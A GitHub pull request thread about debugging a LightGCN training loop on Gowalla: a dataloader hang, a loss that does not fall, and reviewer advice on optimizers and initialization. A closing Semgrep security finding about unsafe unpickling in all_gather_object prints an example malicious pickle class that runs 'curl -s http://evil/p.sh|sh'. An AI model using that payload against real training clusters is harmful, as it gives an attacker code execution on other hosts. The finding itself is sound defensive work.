
Conversation

@swong3-sc (Collaborator) commented Dec 3, 2025

Scope of work done

This is my training loop for LightGCN on the Gowalla dataset.
There are a number of issues I can't seem to figure out:

  1. The dataloaders seem to fail during training (usually at the 17th batch). There is no error; it just hangs at line 587.
  2. The loss doesn't decrease

I have tried many things to address the loss:

  1. Adding a sparse optimizer from TorchRec (RowWiseAdagrad)
  2. Adding Xavier uniform initialization, after discovering the initial embeddings were too small and thus would not propagate.
  3. Scaling up the embeddings after the forward pass (after the above didn't work), under the assumption that the convolution was shrinking the embeddings too much.

I use this command to run the training locally:
PYTHONWARNINGS=ignore WORLD_SIZE=1 RANK=0 MASTER_ADDR="localhost" MASTER_PORT=20000 python -m GiGL.examples.id_embeddings.heterogeneous_training --task_config_uri="gs://gigl-perm-dev-assets/swong3_gowalla_data_preprocessor_24/config_populator/frozen_gbml_config.yaml"

The parameters are derived from the task config, but I will list them here for reference:
Got training args local_world_size=1, num_neighbors={user-to_train-item: [10, 10], user-to_test-item: [0, 0], item-to_train-user: [15, 15], item-to_test-user: [0, 0]}, sampling_workers_per_process=4, main_batch_size=16, random_batch_size=16, embedding_dim=64, num_layers=2, num_random_negs_per_pos=1, l2_lambda=0.0, sampling_worker_shared_channel_size=4GB, process_start_gap_seconds=0, log_every_n_batch=50, learning_rate=0.01, weight_decay=0.0005, num_max_train_batches=1000, num_val_batches=100, val_every_n_batch=50

Where is the documentation for this feature?: N/A

Did you add automated tests or write a test plan?

Updated Changelog.md? NO

Ready for code review?: NO

Comment on lines +464 to +470
for name, param in base_model._embedding_bag_collection.named_parameters():
    logger.info(f"  Applying RowWiseAdagrad to {name}")
    apply_optimizer_in_backward(
        optimizer_class=RowWiseAdagrad,
        params=[param],
        optimizer_kwargs={"lr": sparse_lr, "weight_decay": weight_decay},
    )
Collaborator:

The conventional pattern is to call apply_optimizer_in_backward once with all the sparse parameters instead of one by one -- I recommend doing this to avoid deviating from that pattern unnecessarily.

https://github.com/meta-pytorch/torchrec/blob/aa1eeda49d0691adeed14dca5e184baab708065f/examples/golden_training/train_dlrm.py#L113
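
For reference, a minimal sketch of that pattern, reusing the base_model, sparse_lr, weight_decay, RowWiseAdagrad, and apply_optimizer_in_backward names already in scope in the snippet above (import paths for those vary across TorchRec versions, so they're assumed to match whatever this file already imports): register the in-backward optimizer once over all of the EmbeddingBagCollection's parameters.

```python
# Sketch only: one registration for all sparse embedding parameters,
# mirroring the TorchRec golden_training example linked above.
apply_optimizer_in_backward(
    optimizer_class=RowWiseAdagrad,
    params=base_model._embedding_bag_collection.parameters(),
    optimizer_kwargs={"lr": sparse_lr, "weight_decay": weight_decay},
)
```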

Collaborator Author:

Will change

return loss, debug_info


def _training_process(
Collaborator:

I would recommend testing everything related to loss reduction in a single process, with no distributed setup.

return main_loader, random_negative_loader


def bpr_loss(
Collaborator:

To debug whether minimizing BPR specifically is causing the issue or something else is broken, I recommend testing with a dummy loss that is very easy to minimize, e.g. the sum of the query embedding, positive embedding, and negative embedding. In that case, simply making every number in each embedding smaller reduces the loss, so it is trivial to optimize. If the embeddings still aren't getting updated properly and the loss still doesn't go down after that change, something is very likely broken in the optimization/gradient flow.
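
To make that concrete, here is a minimal sketch of such a dummy loss (the argument names and shapes just mirror the bpr_loss signature in this file; the exact reduction is arbitrary, anything trivially minimizable works):

```python
import torch


def dummy_loss(
    query_emb: torch.Tensor,  # [M, D]
    pos_emb: torch.Tensor,    # [M, D]
    neg_emb: torch.Tensor,    # [M, D] or [M, K, D]
) -> torch.Tensor:
    # Trivially minimizable objective: the sum of every embedding value.
    # Any working optimizer/gradient path should drive this down from the
    # very first steps; if it doesn't move, the problem is in the
    # optimization/gradient flow, not in BPR.
    return query_emb.sum() + pos_emb.sum() + neg_emb.sum()
```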

Collaborator Author:

With BPR loss, I am able to go from about 0.6913 -> 0.2335 in 1000 batches of size 512.

@nshah-sc (Collaborator) commented Dec 3, 2025

Can you add a run command so we know all the parameters used and how to kick this off locally?

@nshah-sc (Collaborator) left a comment:

Sorry, I forgot to submit this review, which has the associated comments.

    query_emb: torch.Tensor,  # [M, D]
    pos_emb: torch.Tensor,  # [M, D]
    neg_emb: torch.Tensor,  # [M, D] or [M, K, D]
    l2_lambda: float = 0.0,
Collaborator:

I don't think you need l2_lambda -- this is basically just applying L2 regularization, right? We already have weight decay, which is functionally the same as L2 regularization.
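
As a toy illustration of that equivalence (not code from this PR; shown for plain SGD, where optimizer-side weight decay and an explicit L2 term in the loss give the same gradient, which is why the extra l2_lambda knob is redundant):

```python
import torch

w = torch.nn.Parameter(torch.ones(3))
l2_lambda = 0.05

# Route 1: explicit penalty added to the task loss (what l2_lambda does).
loss_with_penalty = w.sum() + l2_lambda * w.pow(2).sum()
grad_explicit = torch.autograd.grad(loss_with_penalty, w)[0]

# Route 2: task loss only, penalty applied by the optimizer as weight decay
# (SGD adds weight_decay * w to the gradient, so weight_decay = 2 * l2_lambda).
grad_task = torch.autograd.grad(w.sum(), w)[0]
grad_with_weight_decay = grad_task + 2 * l2_lambda * w.detach()

print(torch.allclose(grad_explicit, grad_with_weight_decay))  # True
```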

Collaborator Author:

I will look into disabling this and comparing the output.

# Sample some actual node IDs
debug_info["sample_query_ids"] = rep_query_idx[:5].tolist()
debug_info["sample_pos_ids"] = pos_idx[:5].tolist()

Collaborator:

I'm not sure exactly what this function does, as the logic looks fairly complex, but I assume we have tested for correctness that the samples generated here for the positive edge subgraph and the negative edge subgraphs all reflect accurate graph structure and nothing has gone wrong there.

Comment on lines 487 to 505
logger.info(f"---Rank {rank} initializing embeddings with scaled Xavier uniform (AFTER DMP)")
unwrapped_model = unwrap_from_dmp(model)
logger.info(f"EmbeddingBagCollection parameters:")
init_count = 0
EMBEDDING_SCALE = 0.1 # Small scale to avoid saturation
for name, param in unwrapped_model._embedding_bag_collection.named_parameters():
logger.info(f" Found parameter: {name}, shape: {param.shape}, device: {param.device}")
logger.info(f" BEFORE init - mean={param.mean().item():.6f}, std={param.std().item():.6f}, norm={param.norm().item():.6f}")

# Xavier uniform: U(-sqrt(6/(fan_in + fan_out)), sqrt(6/(fan_in + fan_out)))
# For embeddings: fan_in = 1, fan_out = embedding_dim
# Then scale up to combat LightGCN's aggressive neighbor averaging
torch.nn.init.xavier_uniform_(param)
param.data *= EMBEDDING_SCALE
init_count += 1

logger.info(f" AFTER init (scaled {EMBEDDING_SCALE}x) - mean={param.mean().item():.6f}, std={param.std().item():.6f}, norm={param.norm().item():.6f}")

logger.info(f"Initialized {init_count} embedding parameters after DMP wrapping with {EMBEDDING_SCALE}x scaling")
Collaborator:

I don't think you actually need this; you should still be able to train these models without doing manual embedding surgery for initialization. Even just their default random initialization should be a reasonable starting spot. I'd suggest dropping this to avoid overcomplicating the example.

Collaborator Author:

Yeah, I agree


optimizer.zero_grad()
logger.info(f"Zeroing gradients")
main_data = next(train_main_iter)
Collaborator:

Maybe @kmontemayor2-sc can help you debug why this hangs after some fixed number of batches in your current setting. Sometimes this can happen if the iterator runs out of data, which shouldn't be possible given the InfiniteIterator logic, but if it always hangs after 17 batches, that indicates some deterministic issue. Maybe it hangs after finishing one whole pass of the data and cannot cycle back for another pass due to exception handling or un-terminate-able logic in the iterator code; or perhaps the dataloader always fails/hangs on a particular seed node that appears after 17 batches. Figuring out which is true is important and can be done in isolation from the rest of this example. I'd recommend doing all of this in a single process as well, to avoid errors being silently suppressed by the multiprocessing environment.
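
One rough sketch of how to probe this: build the main loader exactly as the training code already does, then iterate it on its own in a single process (no DDP, no training step) and log per-batch timing. The helper below is hypothetical glue rather than existing GiGL code; it just takes whatever loader object you already construct.

```python
import itertools
import logging
import time

logger = logging.getLogger(__name__)


def probe_loader(loader, max_batches: int = 50) -> None:
    """Iterate a dataloader in isolation to see where it stalls.

    If it always stalls at the same batch index, the problem is deterministic
    (e.g. end-of-epoch/cycling logic or a specific seed node); if the stall
    moves around between runs, it points more toward the sampling workers or
    the shared channel.
    """
    it = iter(loader)
    for i in itertools.count():
        if i >= max_batches:
            break
        start = time.monotonic()
        batch = next(it)  # if this hangs, note the batch index i
        logger.info(
            "batch %d fetched in %.2fs (%s)",
            i, time.monotonic() - start, type(batch).__name__,
        )
```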

Collaborator Author:

@kmontemayor2-sc and @mkolodner-sc helped greatly, and we sort of figured it out by increasing the number of sampling workers. I can now train locally and minimize loss, which is good.

node_type_to_num_nodes[node_type] = num_nodes
logger.info(f"Node type {node_type}: {num_nodes} nodes (max_id={max_id})")
output_list = [None for _ in range(torch.distributed.get_world_size())]
torch.distributed.all_gather_object(output_list, node_type_to_num_nodes)


Semgrep identified an issue in your code:

all_gather_object unpickles data from peers. A hostile rank can send a crafted object that executes code on your process during the collective.

More details about this

torch.distributed.all_gather_object(output_list, node_type_to_num_nodes) receives Python objects from every peer and unpickles them. Because unpickling executes attacker‑controlled reducers, a malicious or compromised rank can make your process run arbitrary code as soon as the collective completes.

Concrete exploit path

  • Setup: init_process_group(backend="gloo") creates a process group where every rank exchanges objects.
  • Attacker control: A hostile rank crafts an object whose __reduce__ triggers a command (e.g., to drop a shell or exfiltrate secrets).
  • Trigger: When your code calls torch.distributed.all_gather_object(output_list, node_type_to_num_nodes), the library unpickles the attacker’s object before putting it into output_list.
  • Impact: Code runs within your training/data‑loading process, with your permissions (can read dataset, env vars, credentials, write to model outputs, pivot the host). Example attacker object on a peer:
    class Pwn:
        def __reduce__(self):
            import os
            return (os.system, ("curl -s http://evil/p.sh|sh",))

    torch.distributed.all_gather_object([None] * world_size, Pwn())

    Your process will execute the os.system payload as part of unpickling during the same all_gather_object that populates output_list.

Why this code is at risk here

  • The call site exchanges arbitrary Python objects (node_type_to_num_nodes dict) with every participant; any untrusted or compromised peer can inject a malicious object that is executed on receipt.
  • The subsequent loop over output_list happens after the dangerous unpickle has already occurred, so the damage is done even if you never use the malicious data.

To resolve this comment:

✨ Commit Assistant Fix Suggestion
  1. Only use torch.distributed.all_gather_object to share simple or builtin Python types, such as dictionaries with string and int keys/values, not arbitrary objects or classes.
  2. Check that node_type_to_num_nodes only contains basic, serializable objects; avoid custom objects or types that require pickle to deserialize.
  3. If sharing custom objects is required, serialize node_type_to_num_nodes to a safe format like JSON with json.dumps(node_type_to_num_nodes) before broadcasting, and deserialize after receiving with json.loads.
  4. Alternatively, if all participants can reconstruct the dictionary from public information, avoid transmitting it with all_gather_object and have each process build it independently.
  5. Avoid using any of the following for keys or values when sharing data: classes, functions, non-builtin types, or anything that cannot be converted to JSON.

Passing only simple objects reduces the attack surface for arbitrary code execution caused by Python's pickle mechanism in distributed functions.
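
A different route in the same spirit (not one of the listed suggestions): exchange the counts as a plain int64 tensor via all_gather, so no Python objects are unpickled at all. This is a hedged sketch that assumes every rank can agree on the full, ordered list of node types up front (e.g. from the shared task config); the function name below is hypothetical.

```python
import torch
import torch.distributed as dist


def all_gather_node_counts(
    node_type_to_num_nodes: dict,  # {node_type_str: num_nodes} on this rank
    all_node_types: list,          # same, agreed-upon order on every rank
) -> list:
    """Exchange per-rank node counts without pickling arbitrary Python objects."""
    world_size = dist.get_world_size()
    local = torch.tensor(
        [int(node_type_to_num_nodes.get(nt, 0)) for nt in all_node_types],
        dtype=torch.int64,
    )
    gathered = [torch.zeros_like(local) for _ in range(world_size)]
    dist.all_gather(gathered, local)  # tensor collective, no pickle involved
    return [
        {nt: int(counts[i]) for i, nt in enumerate(all_node_types)}
        for counts in gathered
    ]
```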

💬 Ignore this finding

Reply with Semgrep commands to ignore this finding.

  • /fp <comment> for false positive
  • /ar <comment> for acceptable risk
  • /other <comment> for all other reasons

Alternatively, triage in Semgrep AppSec Platform to ignore the finding created by pickles-in-pytorch-distributed.

You can view more details about this finding in the Semgrep AppSec Platform.
